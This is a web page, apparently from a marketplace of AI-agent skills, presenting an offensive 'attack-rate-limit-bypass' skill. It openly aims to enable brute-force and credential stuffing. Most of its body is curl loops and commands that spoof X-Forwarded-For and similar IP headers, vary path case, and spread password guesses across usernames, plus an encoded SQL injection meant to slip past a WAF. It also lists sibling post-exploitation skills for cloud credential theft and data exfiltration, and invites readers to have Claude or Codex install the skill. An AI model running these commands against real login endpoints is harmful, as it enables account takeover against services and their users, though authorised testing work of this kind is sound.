菜单
Rate limit bypass testing — XFF rotation, case variation, method switching, header manipulation
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-rate-limit-bypass |
| description | Rate limit bypass testing — XFF rotation, case variation, method switching, header manipulation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["rate-limit","brute-force","web","bypass","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-307","CWE-770"] |
| chains_with | ["attack-race-condition"] |
| prerequisites | [] |
| severity_boost | {"attack-race-condition":"Rate limit bypass + race condition = unlimited exploitation"} |
Bypass rate limiting mechanisms to enable brute-force attacks, credential stuffing, or abuse of rate-limited functionality.
# Full bypass test suite (5 techniques)
attack_script rate_limit_bypass "https://TARGET/api/login" \
--method POST \
-H "Content-Type:application/json" \
-d '{"email":"test@test.com","password":"test"}' \
--count 20 \
--json-output
Tests automatically:
# Rotate source IP via headers
for i in $(seq 1 50); do
IP="$((RANDOM%254+1)).$((RANDOM%254+1)).$((RANDOM%254+1)).$((RANDOM%254+1))"
curl -s -o /dev/null -w "%{http_code} " \
-X POST https://TARGET/api/login \
-H "X-Forwarded-For: $IP" \
-H "X-Real-IP: $IP" \
-H "X-Client-IP: $IP" \
-d '{"email":"test@test.com","password":"guess"}'
done
# Path case variation
curl https://TARGET/API/LOGIN
curl https://TARGET/Api/Login
# Trailing slash/dot
curl https://TARGET/api/login/
curl https://TARGET/api/login/.
# Double slash
curl https://TARGET//api//login
# Random query params (new cache key)
curl "https://TARGET/api/login?_=$(date +%s)"
curl -X POST https://TARGET/api/login \
-H "X-Forwarded-For: 127.0.0.1"
curl -X POST https://TARGET/api/login \
-H "X-Forwarded-Host: localhost"
curl -X POST https://TARGET/api/login \
-H "X-Original-URL: /api/login"
curl -X POST https://TARGET/api/login \
-H "X-Custom-IP-Authorization: 127.0.0.1"
# Distribute across usernames
for user in user1 user2 user3; do
curl -X POST https://TARGET/api/login \
-d "{\"email\":\"$user@test.com\",\"password\":\"common_password\"}"
done
# IP rotation + distributed usernames = bypass
# Encode payloads to avoid WAF detection
attack_script waf_bypass "admin' OR 1=1--" --test-url "https://TARGET/api/login" --param password
| Finding | Severity |
|---|---|
| Rate limit bypass on login/auth endpoint | High (P2) |
| Rate limit bypass on password reset | High (P2) |
| Rate limit bypass on OTP/2FA verification | Critical (P1) |
| Rate limit bypass on financial operations | Critical (P1) |
| Rate limit bypass on non-sensitive endpoint | Low (P4) |
attack_script rate_limit_bypass — automated 5-technique bypass testingattack_script waf_bypass — encoding variants for WAF bypass